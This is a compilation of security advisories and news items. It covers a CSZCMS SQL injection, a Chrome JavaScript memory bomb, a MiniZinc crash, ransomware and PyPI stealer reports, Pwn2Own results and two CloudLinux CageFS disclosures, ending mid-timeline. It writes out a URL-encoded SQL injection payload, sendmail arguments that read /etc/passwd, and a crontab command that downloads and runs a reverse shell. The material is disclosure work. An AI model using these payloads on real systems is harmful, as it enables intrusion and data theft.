CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as Faust.
Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script.
"The attackers utilized the Gitea service to store several files

Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as **Faust**.

Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script.

"The attackers utilized the Gitea service to store several files encoded in Base64, each carrying a malicious binary," security researcher Cara Lin said in a technical report published last week. "When these files are injected into a system's memory, they initiate a file encryption attack."

Faust is the latest addition to several ransomware variants from the Phobos family, including Eking, Eight, Elbie, Devos, and 8Base. It's worth noting that Faust was previously documented by Cisco Talos in November 2023.

The cybersecurity firm described the variant as active since 2022 and "does not target specific industries or regions."

The attack chain commences with an XLAM document that, when opened, downloads Base64-encoded data from Gitea in order to save a harmless XLSX file, while also stealthily retrieving an executable that masquerades as an updater for the AVG AntiVirus software ("AVG updater.exe").

The binary, for its part, functions as a downloader to fetch and launch another executable named "SmartScreen Defender Windows.exe" in order to kick-start its encryption process by employing a fileless attack to deploy the malicious shellcode.

"The Faust variant exhibits the ability to maintain persistence in an environment and creates multiple threads for efficient execution," Lin said.

The development comes as new ransomware families such as Albabat (aka White Bat), Kasseika, Kuiper, Mimus, and NONAME have gained traction, with the former a Rust-based malware that's distributed in the form of fraudulent software such as a fake Windows 10 digital activation tool and a cheat program for the Counter-Strike 2 game.

Trellix, which examined the Windows, Linux, and macOS versions of Kuiper earlier this month, attributed the Goland-based ransomware to a threat actor named RobinHood, who first advertised it on underground forums in September 2023.

"The concurrency focused nature of Golang benefits the threat actor here, avoiding race conditions and other common problems when dealing with multiple threads, which would have otherwise been a (near) certainty," security researcher Max Kersten said.

"Another factor that the Kuiper ransomware leverages, which is also a reason for Golang's increased popularity, are the language's cross-platform capabilities to create builds for a variety of platforms. This flexibility allows attackers to adapt their code with little effort, especially since the majority of the code base (i.e., encryption-related activity) is pure Golang and requires no rewriting for a different platform."

NONAME is also noteworthy for the fact that its data leak site imitates that of the LockBit group, raising the possibility that it could either be another LockBit or that it collects leaked databases shared by LockBit on the official leak portal, researcher Rakesh Krishnan pointed out.

The findings follow a report from French cybersecurity company Intrinsec that connected the nascent 3AM (also spelled ThreeAM) ransomware to the Royal/BlackSuit ransomware, which, in turn, emerged following the shutdown of the Conti cybercrime syndicate in May 2022.

The links stem from a "significant overlap" in tactics and communication channels between 3 AM ransomware and the "shared infrastructure of ex-Conti-Ryuk-TrickBot nexus."

That's not all. Ransomware actors have been observed once again using TeamViewer as an initial access vector to breach target environments and attempt to deploy encryptors based on the LockBit ransomware builder, which leaked in September 2022.

"Threat actors look for any available means of access to individual endpoints to wreak havoc and possibly extend their reach further into the infrastructure," cybersecurity firm Huntress said.

In recent weeks, LockBit 3.0 has also been distributed in the form of Microsoft Word files disguised as resumes targeting entities in South Korea, according to the AhnLab Security Intelligence Center (ASEC).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Albabat, Kasseika, Kuiper: New Ransomware Gangs Rise with Rust and Golang

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems.
The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."
"These

PyPI Repository / Malware

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called **WhiteSnake Stealer** on Windows systems.

The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS."

"These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week.

"Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed."

While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog and Checkmarx disclosed last year.

"The Windows-specific payload was identified as a variant of the \[...\] WhiteSnake malware, which has an Anti-VM mechanism, communicates with a C&C server using the Tor protocol, and is capable of stealing information from the victim and executing commands," JFrog noted in April 2023.

It's also designed to capture data from web browsers, cryptocurrency wallets, and apps like WinSCP, CoreFTP, Windscribe, Filezilla, AzireVPN, Snowflake, Steam, Discord, Signal, and Telegram.

Checkmarx is tracking the threat actor behind the campaign under the moniker PYTA31, stating the end goal is to exfiltrate sensitive and particularly crypto wallet data from the target machines.

Some of the newly published rogue packages have also been observed incorporating clipper functionality to overwrite clipboard content with attacker-owned wallet addresses to carry out unauthorized transactions. A few others have been configured to steal data from browsers, applications, and crypto services.

Fortinet said the finding "demonstrates the ability of a single malware author to disseminate numerous info-stealing malware packages into the PyPI library over time, each featuring distinct payload intricacies."

The disclosure comes as ReversingLabs discovered two malicious packages on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

By Deeba Ahmed
FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI),…
This is a post from HackRead.com Read the original post: Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

FortiGuard Labs’ latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI), an open repository for Python\-developed software packages, to upload malware-infected packages. This exploitation of PyPI’s infrastructure poses significant risks to users.

FortiGuard Labs team recently identified a PyPI malware author, “WS,” uploading malicious packages to PyPI, estimating over 2000 potential victims. The identified packages, including nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111, show attack methodologies that resemble the attacks identified by Checkmarx in 2023.

These packages contain base64-encoded Python scripts, which are executed depending on the victim’s operating system. The packages deploy Whitesnake PE malware on Windows devices or a Python script to steal information from Linux devices.

What’s interesting in this scheme is that Python scripts are using a new method to transmit stolen data, using a range of IP addresses as the destination instead of a single fixed URL. This helps ensure successful data transmission even when one server fails.

Recently identified packages primarily target Windows users, whereas previous ones targeted both Linux and Windows users. The objective is to exfiltrate sensitive information from victims.

The Whitesnake PE payload is a Python-compiled executable created using the PyInstaller tool, displaying an incomplete script file ‘main.pyc’ and another file ‘addresses.py.’ This is rather suspicious. ‘Main.pyc’ is clandestine code that copies itself to the Windows startup folder for autorun, probes logical drives, and monitors the count of running instances.

It also retrieves clipboard contents and compares them against predefined cryptocurrency address patterns, prompting it to overwrite the clipboard with corresponding addresses from ‘addresses.py’, potentially deceiving victims into directing cryptocurrency transactions to an unexpected destination.

The payload, an encrypted.NET executable launches an invisible window right after its installation and adds itself to Windows Defender‘s exclusion list. It then creates a scheduled task to run every hour on the compromised device. The task connects a malicious IP to a client using “socket.io” and collects sensitive user data, including IP address and host credentials.

The payload captures wallet and browser data and sends it to a suspicious IP address via a remote server as a.zip file with multiple encryption layers, which the attacker extracts and exfiltrates. Debugging revealed strings that indicated information stolen from a wide range of devices, such as cryptocurrency services, applications, and browsers.

Timeline of the malicious PyPI packages published by “WS” (Screenshot: Fortinet Labs)

The research reveals how easily a single malware author can distribute multiple info-stealing packages into the PyPI library, highlighting the need for vigilance when using open-source packages.

“Information-stealing malware is an increasingly pertinent and pressing subject. Safeguarding against such persistent adversaries demands a strategic and forward-thinking approach to fortify your defences,” FortiGuard Labs researchers concluded.

****_RELATED ARTICLES_****

1.  **Luna Grabber Malware Hits Roblox Devs Through npm Packages**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **GitHub Abused to Spread Malicious Packages on PyPI in Image Files**
4.  **NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package**
5.  **FortiGuard Labs Uncovers Series of Malicious NPM Packages Stealing Data**

Crypto Stealing PyPI Malware Hits Both Windows and Linux Users

By Deeba Ahmed
Vendors have 90 days to release security patches before Trend Micro publicly discloses it.
This is a post from HackRead.com Read the original post: Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

Pwn2Own Automotive 2024 took place in Tokyo, Japan, from January 24 to 26.

Pwn2Own Automotive 2024, a three-day contest organized by Trend Micro’s Zero Day Initiative, saw competitors earn $1,323,750 for hacking Tesla twice and discovering 49 zero-day bugs in EV systems.

Synacktiv Team won the contest, earning $450,000 in cash for hacking a Tesla car twice, gaining root permissions, and demonstrating a sandbox escape in the Tesla infotainment system. They also demonstrated two-bug chains against Ubiquiti Connect and JuiceBox 40 Smart EV Stations. Second on the list was fuzzware.io for received $177,500. In third place were Midnight Blue/PHP Hooligans with $80,000 in rewards.

Participants earned over $700,000 on the first day, including $60,000 for EV charger hacks and $40,000 for infotainment system and Tesla modem hacks. The second day saw the Automotive Grade Linux exploit earning the biggest reward of $35,000, while EV charger exploits earned teams $30,000. On the third day, researchers received $60,000 for an Emporia EV charger exploit and $30,000 each for other exploits, resulting in payouts ranging from $20,000 to $26,000.

Here, are the prominent happenings and results from all three days of the contest.

On the first day, researchers discovered vulnerabilities in Tesla’s modem, Sony’s infotainment systems, and Alpine’s car audio players, collectively earning $722,500 in awards for identifying three bug collisions and 24 zero-day exploits.

The NCC Group EDG team won $70,000 for exploiting zero-day bugs to hack Pioneer DMH-WT7600NEX and Phoenix Contact CHARX SEC-3100 EV chargers. Sina Kheirkhah, Tobias Scharnowski, and Felix Buchmann attacked ChargePoint Home Flex and Sony XAV-AX5500, earning $60,000 and $40,000, respectively.

Synacktiv Team successfully exploited Tesla Modem and JuiceBox 40 Smart EV charging stations, while the PCAutomotive Team exploited Alpine Halo9 iLX-F509.

On Day 2, Team Tortuga successfully exploited a known bug in a 2-bug chain against the ChargePoint Home Flex, earning $5,000 and 3 Master of Pwn Points. The Midnight Blue / PHP Hooligans team also used a known bug in a 3-bug chain to exploit the Phoenix Contact CHARX SEC-3100, earning $30,000 and 6 Master of Pwn Points.

PCAutomotive couldn’t exploit the JuiceBox 40 Smart EV Charging Station whereas Katsuhiko Sato successfully attacked the Sony XAV-AX5500, earning $10,000 and 2 Master of Pwn Points.

Computest Sector 7 successfully targeted the JuiceBox 40 Smart EV Charging Station for a known bug, earning $15,000 and 3 Master of Pwn Points. Sina Kheirkhah failed to exploit the Autel MaxiCharger AC Wallbox Commercial, while Synacktiv and NCC Group EDG successfully exploited the Tesla Infotainment System and Alpine Halo9 iLX-F509, using a 2-bug chain, earning $100,000 and $20,000, respectively.

Synacktiv earned $35,000 and 5 Master of Pwn Points using a 3-bug chain, while Le Tran Hai Tung earned $20,000 and 4 Master of Pwn Points using a 2-bug chain. Sina Kheirkhah and Alex Olson failed to get their exploits working, while fuzzware.io earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow. RET2 Systems also earned $30,000 and 6 Master of Pwn Points using a stack-based buffer overflow.

Day 3 saw Computest Sector 7 exploiting the ChargePoint Home Flex and earning $30,000 and 6 Master of Pwn Points using a 2-bug chain. Synacktiv successfully exploited the Sony XAV-AX5500, earning $20,000 and 4 Master of Pwn Points. Katsuhiko Sato failed to exploit the Pioneer DMH-WT7600NEX.

Sina Kheirkhah attacked the Ubiquiti Connect EV, earning $30,000 and 6 Master of Pwn Points. fuzzware.io exploited the Phoenix Contact CHARX SEC-3100, earning $22,500 and 4.5 Master of Pwn Points.

Nettitude’s Connor Ford exploited the JuiceBox 40 Smart EV Charging Station, using a stack-based buffer overflow, earning $30,000 and 6 Master of Pwn Points. Team Cluck exploited the Phoenix Contact CHARX SEC-3100, earning $26,250 and 5.25 Master of Pwn Points.

Vendors have 90 days to release security patches before Trend Micro publicly discloses it.

****_RELATED ARTICLES_****

1.  6 of the Best Crypto Bug Bounty Programs
2.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
3.  Pwn2Own 2023: Tesla Model 3, Windows 11, Ubuntu Pwned

Hackers Crack Tesla Twice, Rake in $1.3 Million at Pwn2Own Automotive

CloudLinux CageFS versions 7.0.8-2 and below insufficiently restrict file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files of certain file formats outside the CageFS environment.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Insufficiently Restricted Proxy Command #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths  
supplied to the `sendmail` proxy command. This allows local users to read  
and write arbitrary files of certain file formats outside the CageFS  
environment.

* **Identifier**            : SBA-ADV-20200707-02  
* **Type of Vulnerability** : External Control of File Name or Path  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.0.8-2  
* **Fixed in Version**      : 7.1.1-1  
* **CVE ID**                : CVE-2020-36772  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L  
* **CVSS Base Score**       : 6.6 (Medium)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

A CageFS-restricted local user can read and write arbitrary files of certain  
file formats outside the CageFS environment by exploiting the vulnerability  
documented in this advisory.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS environment.

CageFS allows in its default configuration to execute `sendmail` as a proxy  
command outside the CageFS environment. This default configuration is  
designed to allow local programs sending emails by invoking `sendmail`.  
Due to the insufficient validation of sendmail's arguments an attacker can  
invoke other sendmail functionality as well. While CageFS applies some  
restrictions to the allowed arguments it does not restrict or validate the  
`-bi` and `-oA` arguments.

Therefore, an attacker can have `sendmail` access arbitrary files which will  
be interpreted as alias database files by enabling the `newalias` mode of  
`sendmail` with `-bi` and specifying a file located outside the CageFS  
environment with `-oA`.

On systems using the Postfix to Sendmail compatibility interface, a great  
number of different alias database types can be used to craft exploits.  
The compatibility interface internally calls `postalias` and besides the  
`-oA` argument already being dangerous by itself, it also suffers from an  
argument injection issue, which allows injection of additional Postfix  
specific arguments for `postalias`. However, this is not a security issue  
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a  
security policy on command-line arguments. Instead, it relies on the  
UNIX/Linux system to enforce access policies based on the effective user and  
group IDs of the process. If a security policy should be enforced, the  
calling process must sanitize the command-line arguments before they are  
given to `sendmail`. This includes but is not limited to sanity checks on  
pathnames, and if applicable sanity checks on file contents in a way that  
is not vulnerable to time-of-check to time-of-use race attacks, and  
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially  
follow the structure `key <whitespace> value` via the lookup table type  
`texthash`:

```sh  
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'  
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line  
[...]  
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line  
sssd:x:496:493:User:    for sssd:/:/sbin/nologin  
dbus:x:81:81:System:    message bus:/:/sbin/nologin  
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin  
tss:x:59:59:Account:    used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin  
systemd-resolve:x:193:193:systemd:      Resolver:/:/sbin/nologin  
rngd:x:494:491:Random:  Number Generator Daemon:/var/lib/rngd:/sbin/nologin  
sshd:x:74:74:Privilege-separated:       SSH:/var/empty/sshd:/sbin/nologin  
systemd-coredump:x:499:497:systemd:     Core Dumper:/:/sbin/nologin  
nobody:x:65534:65534:Kernel:    Overflow User:/:/sbin/nologin  
ftp:x:14:50:FTP:        User:/var/ftp:/sbin/nologin  
unbound:x:498:496:Unbound:      DNS resolver:/etc/unbound:/sbin/nologin  
nrpe:x:492:486:NRPE:    user for the NRPE service:/var/run/nrpe:/sbin/nologin  
```

The attacker can also use other lookup table types which might disclose  
sensitive information. For example, `unix` allows the query of specific  
users regardless of the format:

```sh  
$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'  
ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin  
```

An attacker can also write specific file formats outside the CageFS  
environment. For example, with the `hash` lookup table type:

```sh  
$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'  
$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'  
@:      @  
YP_LAST_MODIFIED:       1594138203  
YP_MASTER_NAME: localhost  
sba:    was_here  
```

## Recommended Countermeasures ##

We recommend to restrict the `sendmail` command to only strictly required  
parameters using an allow list approach. At least the following parameters  
are known to cause dangerous behavior:

* `-oA`: Allows specification of multiple paths and additional arguments.  
  It is important to consider that it is directly followed by the pathname  
  without a separator, i.e., `-oA/etc/passwd`.  
* `-bi`: Enables the `newalias` mode of `sendmail`.  
* `-I`: Enables the `newalias` mode of `sendmail`.  
* `-v`: If the parameter is added at least two times, i.e., `-vv`,  
  `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the  
  Postfix configuration in some cases.

We did not fully analyze other parameters of `sendmail`, therefore, it is  
possible that `sendmail` as proxy command is also prone to other attacks.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-08-06`: vendor released version 7.1.1-1 to testing  
* `2020-09-03`: vendor released version 7.1.1-1 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36772  
* `2024-01-25`: public disclosure

## References ##

* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1>  
* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3  
dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw  
GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP  
pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/  
srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2  
6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH  
9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm  
jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V  
fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP  
OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH  
8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo  
H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=  
=E60q  
-----END PGP SIGNATURE-----

CloudLinux CageFS 7.0.8-2 Insufficiently Restricted Proxy Command

CloudLinux CageFS versions 7.1.1-1 and below pass the authentication token as a command line argument. In some configurations this allows local users to view the authentication token via the process list and gain code execution as another user.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a  
command line argument. In some configurations this allows local users to  
view the authentication token via the process list and gain code execution  
as another user.

* **Identifier**            : SBA-ADV-20200707-01  
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.1.1-1  
* **Fixed in Version**      : 7.1.2-2  
* **CVE ID**                : CVE-2020-36771  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* **CVSS Base Score**       : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem  
feature is disabled, a local user can obtain the CageFS authentication  
token of other users by exploiting the vulnerability documented in this  
advisory. In most configurations this allows attackers to gain code  
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS envinronment.

For this purpose a CageFS daemon runs outside of the CageFS environment,  
it is accessible via a UNIX socket from within the CageFS environment.  
The UNIX socket is handled by `proxyexec`. To make the whole process of  
calling a tool outside of the CageFS transparent to the user, wrapper  
scripts are placed within CageFS, which in turn call `proxyexec` for  
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`  
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which  
prevents other users from seeing the CageFS token within the process  
list. However, if the `lve_namespaces` service is disabled, e.g. the  
systemd unit is masked out, or the virtualized proc filesystem is  
explicitly disabled, other users can see the CageFS token within the  
process list. They can use the CageFS token of other users to talk to  
the CageFS daemon via `proxyexec` and the CageFS daemon executes the  
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume, the `lve_namespaces` service is disabled and we are user  
`ftp2406151`:

```sh  
$ id  
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)  
```

We list the process list and find another user executing `ping example.org`:

```sh  
$ ps aux | grep proxyexec  
 2094 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1180646 934       0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org  
1180647 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1181229 ftp24061  0:00 grep proxyexec  
```

We now can execute commands as user `ftp1488781` and, for example, view  
the crontab:

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
no crontab for ftp1488781  
```

Now we setup a new crontab entry, which downloads a reverse shell and  
executes it every minute:

```sh  
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0  
```

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &  
```

Our shell connects back to us and we can execute arbitrary commands as  
the other user:

```sh  
$ nc -l -p 1234  
id  
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)  
```

## Recommended Countermeasures ##

We recommend to avoid passing sensitive information as a command line  
argument. Instead, `proxyexec` should directly read the CageFS token  
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS  
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
